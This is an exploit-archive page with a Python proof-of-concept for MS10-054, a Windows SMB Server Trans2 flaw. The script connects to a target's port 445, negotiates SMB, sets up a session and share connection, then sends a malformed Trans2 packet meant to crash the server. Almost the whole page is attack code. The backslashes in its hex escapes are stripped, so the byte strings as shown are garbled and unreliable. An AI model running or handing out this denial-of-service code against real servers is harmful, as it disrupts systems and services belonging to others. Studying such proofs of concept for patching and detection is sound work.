Microsoft SMB Server Trans2 Zero Size Pool Alloc (MS10-054)

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Microsoft SMB Server Trans2 Zero Size Pool Alloc (MS10-054)
# Published : 2010-08-10
# Author : Laurent Gaffie
# Previous Title : Microsoft Windows CreateWindow Function Callback Vulnerability (MS10-048)
# Next Title : Rosoft media player 4.4.4 SEH buffer overflow POC

#!/usr/bin/env python
import sys,struct,socket
from socket import *

if len(sys.argv)<=2:
   print '#######################################################################'
   print '#   MS10-054 Proof Of Concept by Laurent Gaffie'
   print '#   Usage: python '+sys.argv[0]+' TARGET SHARE-NAME (No backslash)'
   print '#   Example: python '+sys.argv[0]+' 192.168.8.101 users'
   print '#   http://g-laurent.blogspot.com/'
   print '#   http://twitter.com/laurentgaffie'
   print '#   Email: laurent.gaffie{at}gmail{dot}com'
   print '#######################################################################nn'
   sys.exit()

host = str(sys.argv[1]),445

packetnego =  "x00x00x00x9a"
packetnego += "xffx53x4dx42x72x00x00x00x00x00x00x00x00x00x00x00"
packetnego += "x00x00x00x00x00x00x00x00x00x00xc3x15x00x00x01x3d"
packetnego += "x00x77x00x02x50x43x20x4ex45x54x57x4fx52x4bx20x50"
packetnego += "x52x4fx47x52x41x4dx20x31x2ex30x00x02x4dx49x43x52"
packetnego += "x4fx53x4fx46x54x20x4ex45x54x57x4fx52x4bx53x20x33"
packetnego += "x2ex30x00x02x44x4fx53x20x4cx4dx31x2ex32x58x30x30"
packetnego += "x32x00x02x44x4fx53x20x4cx41x4ex4dx41x4ex32x2ex31"
packetnego += "x00x02x57x69x6ex64x6fx77x73x20x66x6fx72x20x57x6f"
packetnego += "x72x6bx67x72x6fx75x70x73x20x33x2ex31x61x00x02x4e"
packetnego += "x54x20x4cx4dx20x30x2ex31x32x00"

def tidpiduidfield(data):
    all_=data[28:34]
    return all_

def handle(data):
    ##Chained SMB commands; Session Setup AndX Request,Tree connect
    if data[8:10] == "x72x00":
       sharename = "x00x00x5cx5cx5c"+str(sys.argv[2])+"x00x3fx3fx3fx3fx3fx00"
       packetsession =  "xffx53x4dx42x73x00x00x00x00x10x00x00x00x00x00x00"
       packetsession += "x00x00x00x00x00x00x00x00x00x00xd5x15x01x00x81x2f"
       packetsession += "x0dx75x00x7ax00x68x0bx32x00x00x00x00x00x00x00x18"
       packetsession += "x00x00x00x00x00x00x00x04x00x00x00x3dx00x01x01x01"
       packetsession += "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
       packetsession += "x01x01x01x01x01x59x4fx00x57x4fx52x4bx47x52x4fx55"
       packetsession += "x50x00x57x69x6ex64x6fx77x73x20x34x2ex30x00x57x69"
       packetsession += "x6ex64x6fx77x73x20x34x2ex30x00x04xffx00x00x00x00"
       packetsession += "x00x01x00"+struct.pack(">i", len(sharename))[3:4]+sharename
       print "[+]Session Query sent"    
       return struct.pack(">i", len(packetsession))+packetsession

    ##Trans2, Request, QUERY_FS_INFO Query FS Attribute Info
    if data[8:10] == "x73x00":
       packetrans = "x00x00x00x46"
       packetrans += "xffx53x4dx42x32x00x00x00x00x00x01xc8x00x00x00x00"
       packetrans += "x00x00x00x00x00x00x00x00"+tidpiduidfield(data)+"x13x00"
       packetrans += "x0fx02x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
       packetrans += "x00x00x00x02x00x44x00x00x00x46x00x01x00x03x00x05"
       packetrans += "x00x00x44x20x05x01"
       print "[+]Malformed Trans2 packet sentn[+]The target should be down now"
       return packetrans

def run():
    s = socket(AF_INET, SOCK_STREAM)
    s.connect(host)
    s.settimeout(2) 
    s.send(packetnego)
    print "[+]Negotiate Protocol Request sent"
    try:
      while True:
        data = s.recv(1024)
        s.send(handle(data))
    except Exception:
        pass
        s.close()
run()